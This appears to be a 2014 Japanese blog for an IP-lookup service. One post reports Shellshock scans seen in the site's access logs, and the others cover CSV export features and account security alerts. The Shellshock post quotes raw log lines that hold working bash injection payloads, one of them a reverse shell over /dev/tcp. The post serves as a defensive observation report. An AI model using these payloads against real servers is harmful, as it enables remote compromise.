adsense

2014年9月27日土曜日

bashの脆弱性(Shellshock)を狙ったリクエスト

bashの脆弱性 (shellshock)のニュースが世間を騒がせていますが、直近の当サイトへのアクセスログを確認したところ、こんなアクセスを観測しました。

x.x.x.x - - [25/Sep/2014:06:25:51 +0000] "GET / HTTP/1.0" 200 26104 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
x.x.x.x - - [26/Sep/2014:12:56:07 +0000] "GET / HTTP/1.0" 200 25833 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/x.x.x.x/3333 0>&1'"
x.x.x.x- - [25/Sep/2014:11:55:03 +0000] "GET / HTTP/1.1" 200 26087 "-" "() { :; }; echo -e \"Content-Type: text/plain\\n\"; echo qQQQQQq"
x.x.x.x - - [25/Sep/2014:13:58:01 +0000] "GET / HTTP/1.1" 200 26076 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"

やはりスキャンが横行しているようですね。アクセス元は中国やアメリカでした。

スキャン元のソースIPアドレスを"shellshock"のタグ名でいくつか登録しておきました。
登録タグの検索ページから確認してみてください。
http://www.iputilities.net/tagsearch.html

もし同様のスキャンを見つけた方は、"shellshock"タグで登録頂けると幸いです。


参考:
GNU bash の脆弱性に関する注意喚起
https://www.jpcert.or.jp/at/2014/at140037.html

警視庁 Bash の脆弱性を標的としたアクセスの観測について
http://www.npa.go.jp/cyberpolice/detect/pdf/20140925-2.pdf




2014年9月13日土曜日

タグの検索結果をエクスポートする機能を追加

タグの検索結果をエクスポートする機能を追加しました。

使い方:
  1. 登録タグの検索画面 http://www.iputilities.net/tagsearch.html へアクセス
  2. 検索キーワードを入力し、検索ボタンをクリック( 例: SPAM)
  3. 検索結果の画面に表示される"Export the result to CSV"のリンクをクリック

"SPAM"の文字列が含まれるタグや"Line"の文字列を含むタグのIPアドレス情報と緯度・経度の情報がCSV形式でダウンロード可能です。





2014年9月8日月曜日

LINEやGmail等のセキュリティアラート

Yahooニュースの個人記事でwww.iputilities.netを扱って頂いてました。
http://bylines.news.yahoo.co.jp/kandatoshiaki/20140907-00038891/

LINEやGmailなどでは、セキュリティアラートにIPアドレス情報が提供されるので、その調査に利用される機会が増えています。また、楽天等のECサイトでもログイン時の履歴にIPアドレスが記録されており、アクセス元の確認に利用できます。

 楽天のログイン履歴の見方:
http://ichiba.faq.rakuten.co.jp/app/answers/detail/a_id/9376 

Google 不審なアクティビティのアラート:
https://support.google.com/accounts/answer/1144110?hl=ja





2014年9月4日木曜日

エクスポート機能追加

タグ付けしたIPアドレスのデータをCSVでダウンロードできるようにしました。
サインインした状態で画面右上のExportのリンクをクリックすると、これまで登録したデータがCSVでダウンロード可能です。(ダウンロードできるのはサインインした状態でご自身が登録したデータのみとなります。)